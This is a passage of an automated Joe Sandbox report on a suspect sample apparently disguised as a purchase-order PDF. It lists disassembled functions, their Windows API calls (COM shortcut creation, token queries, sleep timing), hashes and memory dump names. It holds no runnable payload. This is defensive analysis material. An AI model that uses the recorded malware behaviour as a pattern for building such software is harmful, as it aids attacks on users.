Instruction ID: 7834839484dfe1f2a86c325d3b59302e6f0667cbb12a0c640c5f87321db1a66f
Opcode Fuzzy Hash: bab65fc521bffcab670ac79e100460bb33d6df2eb63303c6affac044e43a6ea8
Instruction Fuzzy Hash: CD21B631700208ABDB10AA758C8AFAE7BB8FF4A710F144079FE45DB251DA70CD41C792

Function 008712F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0087134D
SelectObject.GDI32(?,00000000), ref: 0087135C
BeginPath.GDI32(?), ref: 00871373
SelectObject.GDI32(?,00000000), ref: 0087139C

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 95c4f314ee9ec0361e13b7ec95589ebbe03fe059af804217c0013620054a6302
Instruction ID: 3f28c5d7e56b6ca45f3c63e550e1b084194a81042f7ce3acab4f6f667819d747
Opcode Fuzzy Hash: 95c4f314ee9ec0361e13b7ec95589ebbe03fe059af804217c0013620054a6302
Instruction Fuzzy Hash: 4A215970814608EBDF118F29DC48BA97BB8FB04361F14C226F918D6AA5D775D891EFA0

Function 008CC161 Relevance: 7.6, APIs: 5, Instructions: 61COMMON

Download Yara Rule

APIs

_memcmp.LIBCMT ref: 008CC176
_memcmp.LIBCMT ref: 008CC194
_memcmp.LIBCMT ref: 008CC1A7
_memcmp.LIBCMT ref: 008CC1BF
_memcmp.LIBCMT ref: 008CC1D7

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 6cce89ef79d20ad8f99870a67367b83e53bf2020ba69ebff82d4a2949d19598f
Instruction ID: 7cb03eb34735011572402ae3f13d0103d203f3728f01548d5bf7d9feef563d8f
Opcode Fuzzy Hash: 6cce89ef79d20ad8f99870a67367b83e53bf2020ba69ebff82d4a2949d19598f
Instruction Fuzzy Hash: 7B019B6260411A7BE905B6175C49F6B776CFB61398F0C401BFD08D6683E670DE1182A1

Function 008D4D35 Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 008D4D5C
__beginthreadex.LIBCMT ref: 008D4D7A
MessageBoxW.USER32(?,?,?,?), ref: 008D4D8F
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 008D4DA5
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 008D4DAC

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
String ID:
API String ID: 3824534824-0
Opcode ID: 5bff711123d79c51dbdb071c1847bfd272fdb3fc89e9f0e90753ebfc953206ac
Instruction ID: 4ceb193348501d61e1487408fb77fa812f3aa2d4dce2b02ab02b8ee60668526d
Opcode Fuzzy Hash: 5bff711123d79c51dbdb071c1847bfd272fdb3fc89e9f0e90753ebfc953206ac
Instruction Fuzzy Hash: A611C876908648BBC7119BB89C08EAB7FEDFB85320F144366F924D3351D6758D44CBA1

Function 008C874A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 008C8766
GetLastError.KERNEL32(?,008C822A,?,?,?), ref: 008C8770
GetProcessHeap.KERNEL32(00000008,?,?,008C822A,?,?,?), ref: 008C877F
HeapAlloc.KERNEL32(00000000,?,008C822A,?,?,?), ref: 008C8786
GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 008C879D

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocErrorLastProcess
String ID:
API String ID: 842720411-0
Opcode ID: 62bf0ad604c41cf43d3f6a2785853f40ac193a1c3dd8aca0a2965d31fef8e297
Instruction ID: 9821aa6c6b42c51cd323e22a0896a75bb076c9dd4ba842f977d8babf2e44df14
Opcode Fuzzy Hash: 62bf0ad604c41cf43d3f6a2785853f40ac193a1c3dd8aca0a2965d31fef8e297
Instruction Fuzzy Hash: 97014B71240204EFDB204FB6DC88DAB7BBCFF8A355B204439FA49C2260EA31CC10CA60

Function 008D54E6 Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008D5502
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 008D5510
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 008D5518
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 008D5522
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008D555E

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: e280b5a8ec5aa23203e041416a1a866e5b3801758fd014a321220fbc668e2bcc
Instruction ID: 9909de65bf9a7106e2a8d2209ce5773de695b62dc1aef763c811868bc8bd0d26
Opcode Fuzzy Hash: e280b5a8ec5aa23203e041416a1a866e5b3801758fd014a321220fbc668e2bcc
Instruction Fuzzy Hash: 4801F776D04A1DDBCF019FA8E848AEDBB79FF09711F004167EA01F2241DB305554C7A1

Function 008C7652 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008C758C,80070057,?,?,?,008C799D), ref: 008C766F
ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008C758C,80070057,?,?), ref: 008C768A
lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008C758C,80070057,?,?), ref: 008C7698
CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008C758C,80070057,?), ref: 008C76A8
CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,008C758C,80070057,?,?), ref: 008C76B4

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 55e02779491fc1c141b5bb864dfb8852909bf33b80f6732b46aee6a5148d6372
Instruction ID: 7f1ff12df3d6ff388e67580a26f4a2704ded4e8728334d49ea44a6d60e072df0
Opcode Fuzzy Hash: 55e02779491fc1c141b5bb864dfb8852909bf33b80f6732b46aee6a5148d6372
Instruction Fuzzy Hash: 19015E72611604ABDB105F68DC44FAA7BBDFF48795F144028FE05D2212E731DD40DAA0

Function 008C85F1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 008C8608
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 008C8612
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 008C8621
HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 008C8628
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 008C863E

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: a5c980d10eb08a65386e608fd0c5ca44d243e7e1c009614ddb171b6e8c447963
Instruction ID: 4977f5ba1a778de1ed59fddea3c02c50150e2905dff9884c0aca581fcc297113
Opcode Fuzzy Hash: a5c980d10eb08a65386e608fd0c5ca44d243e7e1c009614ddb171b6e8c447963
Instruction Fuzzy Hash: F7F01431241204AFEB114FB5DC8DE7A3BACFF8A754B000429FA49C6251DB71D841DA60

Function 008C8652 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 008C8669
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 008C8673
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008C8682
HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 008C8689
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 008C869F

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: HeapInformationToken$AllocErrorLastProcess
String ID:
API String ID: 44706859-0
Opcode ID: 7c218e5cd9303be4b2d618a35190b4db570d953059632458a51b16de9f5067cd
Instruction ID: 6e031cf38bc58215d39a0e7c1532c27fc28deedc0bceab4bf3eb66a68e211366
Opcode Fuzzy Hash: 7c218e5cd9303be4b2d618a35190b4db570d953059632458a51b16de9f5067cd
Instruction Fuzzy Hash: E3F03771240204AFEB211FA5EC8CEBB3BACFF89A58B100029FA49C6251DB71D941DA60

Function 008CC6A6 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 008CC6BA
GetWindowTextW.USER32(00000000,?,00000100), ref: 008CC6D1
MessageBeep.USER32(00000000), ref: 008CC6E9
KillTimer.USER32(?,0000040A), ref: 008CC705
EndDialog.USER32(?,00000001), ref: 008CC71F

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: cfad6babfb70d2cde2c3abafb75bd36ee21965e15f937e1cbb047a71d30ffe9a
Instruction ID: 78fed6474995b50f26bac6803ebdccb0f1634243fe57a5a41172c20946190ced
Opcode Fuzzy Hash: cfad6babfb70d2cde2c3abafb75bd36ee21965e15f937e1cbb047a71d30ffe9a
Instruction Fuzzy Hash: 6F014F30500708ABEB215B64DD4EFA677B8FF10B05F00066DF646E14E1DBF4A954CA80

Function 008713B0 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 008713BF
StrokeAndFillPath.GDI32(?,?,008ABAD8,00000000,?), ref: 008713DB
SelectObject.GDI32(?,00000000), ref: 008713EE
DeleteObject.GDI32 ref: 00871401
StrokePath.GDI32(?), ref: 0087141C

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: f1d7a6b3c905ddf8ffa8ded7d568befe934c236842e039a066a76dc9e35a3336
Instruction ID: 59b585f5d99486acfb8bf07d4326362e377cba26794115e81902a726fe1df22f
Opcode Fuzzy Hash: f1d7a6b3c905ddf8ffa8ded7d568befe934c236842e039a066a76dc9e35a3336
Instruction Fuzzy Hash: 06F0E730018708FBDB125F2AEC4CB683FA5FB45326F04C225E669855F6CB3589A5EF64

Function 008DC602 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 279comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 008DC69D
CoCreateInstance.OLE32(00902D6C,00000000,00000001,00902BDC,?), ref: 008DC6B5

Part of subcall function 00877F41: _memmove.LIBCMT ref: 00877F82

CoUninitialize.OLE32 ref: 008DC922

Strings

.lnk, xrefs: 008DC631, 008DC659, 008DC663

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: 7d718b0e6c79ed9712e4bf67cc51c9f46b8375b7c30dd99dad820e970e149043
Instruction ID: 9e4c81d7caedcfa6c48ce5e9c4a8ba782bbf6467898267c142c68d38916621cb
Opcode Fuzzy Hash: 7d718b0e6c79ed9712e4bf67cc51c9f46b8375b7c30dd99dad820e970e149043
Instruction Fuzzy Hash: C3A10B71114205AFD700EF58C891EABB7A8FF95704F00896DF19AD72A2DB70EA49CB52

Function 00882E5B Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 265COMMON

Download Yara Rule

APIs

Part of subcall function 00890FF6: std::exception::exception.LIBCMT ref: 0089102C
Part of subcall function 00890FF6: __CxxThrowException@8.LIBCMT ref: 00891041

Part of subcall function 00877F41: _memmove.LIBCMT ref: 00877F82

Part of subcall function 00877BB1: _memmove.LIBCMT ref: 00877C0B

__swprintf.LIBCMT ref: 0088302D

Strings

\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00882EC6

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
API String ID: 1943609520-557222456
Opcode ID: 20b004b945cb0f80acb232b2defab78ef856bc7924544f262264211d4053dcf7
Instruction ID: 222c7cfbf066aa876cde205453cfe900478b74e8d6fdf988756a75da77d84b78
Opcode Fuzzy Hash: 20b004b945cb0f80acb232b2defab78ef856bc7924544f262264211d4053dcf7
Instruction Fuzzy Hash: C69169715086019FCB28FF28D885C6EB7A4FF95750F04492DF496DB2A5EA20EE44CB52

Function 008DBBA6 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 261comCOMMON

Download Yara Rule

APIs

Part of subcall function 008748AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,008748A1,?,?,008737C0,?), ref: 008748CE

CoInitialize.OLE32(00000000), ref: 008DBC26
CoCreateInstance.OLE32(00902D6C,00000000,00000001,00902BDC,?), ref: 008DBC3F
CoUninitialize.OLE32 ref: 008DBC5C

Part of subcall function 00879997: __itow.LIBCMT ref: 008799C2
Part of subcall function 00879997: __swprintf.LIBCMT ref: 00879A0C

Strings

.lnk, xrefs: 008DBC08, 008DBC16

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
String ID: .lnk
API String ID: 2126378814-24824748
Opcode ID: 49d3e0cf26f57b9162eca160b8c198353fee7c5216b1debace9dee1dfb92c196
Instruction ID: 4019c4d0a15f83c45f66078d7ffe813078883953723182e521791fdd680864c5
Opcode Fuzzy Hash: 49d3e0cf26f57b9162eca160b8c198353fee7c5216b1debace9dee1dfb92c196
Instruction Fuzzy Hash: B9A111756042019FCB00DF18C484E6ABBE5FF89324F158A99F999DB3A1CB31ED45CB92

Function 0089524D Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 008952DD

Part of subcall function 008A0340: __87except.LIBCMT ref: 008A037B

Strings

pow, xrefs: 008952B5, 008952D2

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: fb2b4da8512d7fab1e98e8695db7799cd643e2ae4fbc0c397c2f5696640d2892
Instruction ID: 6e10d4e240fd6b95e7935f724e68d38c49552ec2c2729a957324e51d6123c9c3
Opcode Fuzzy Hash: fb2b4da8512d7fab1e98e8695db7799cd643e2ae4fbc0c397c2f5696640d2892
Instruction Fuzzy Hash: 01517A21E1E60587EF127768C95137E6B90FB02754F284958E4C5C2BE9EE748CC4AF8B

Function 0089023B Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 163COMMON

Download Yara Rule

Strings

#, xrefs: 00890280
+, xrefs: 00890277

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 7e0207df65bf6c0e41aa081d6068bbf47391c74be80bdc37211143b4edc7a24b
Instruction ID: 36faf229a15b6fd9da20e13c2e92ce0f670c006bf1cb8ba3d8dbfa60ed08cb9a
Opcode Fuzzy Hash: 7e0207df65bf6c0e41aa081d6068bbf47391c74be80bdc37211143b4edc7a24b
Instruction Fuzzy Hash: 3351FF7550534A8FCF15AF28C488AFA7BB4FF19310F584069E992DB2A0D734EC82DB61

Function 008862F2 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 143COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 008863A8
_memmove.LIBCMT ref: 00886446
_memset.LIBCMT ref: 0088646A

Strings

ERCP, xrefs: 00886313

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: _memset$_memmove
String ID: ERCP
API String ID: 2532777613-1384759551
Opcode ID: 6db3fc2883b98fa1159f19b993068357b83b926b9f0827f327636822642eafc5
Instruction ID: e7afac12d6070d0c27f4946f3501eb8333f71d439a676a1152c414ae87c35cf7
Opcode Fuzzy Hash: 6db3fc2883b98fa1159f19b993068357b83b926b9f0827f327636822642eafc5
Instruction Fuzzy Hash: BA51BC71900709DFCB24DF64C885BAABBF4FF04314F24856EE94ACA241E771EAA0CB44

Function 008F7BB5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 110COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,008FF910,00000000,?,?,?,?), ref: 008F7C4E
GetWindowLongW.USER32 ref: 008F7C6B
SetWindowLongW.USER32(?,000000F0,00000000), ref: 008F7C7B

Strings

SysTreeView32, xrefs: 008F7C20

Memory Dump Source

Source File: 00000000.00000002.1650478468.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000000.00000002.1649478059.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.00000000008FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1650747741.0000000000925000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652811472.000000000092F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1652828518.0000000000938000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_870000_purchase order_pdf.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 57e9e30d63a6adf0c83ddb98d8deed3c1374aa19126de3392bafb11285ff2c7b
Instruction ID: 6e3f99020215fb47c3c44948ad17919cffcd9f202577d30f40ff4f1fa98466c9
Opcode Fuzzy Hash: 57e9e30d63a6adf0c83ddb98d8deed3c1374aa19126de3392bafb11285ff2c7b
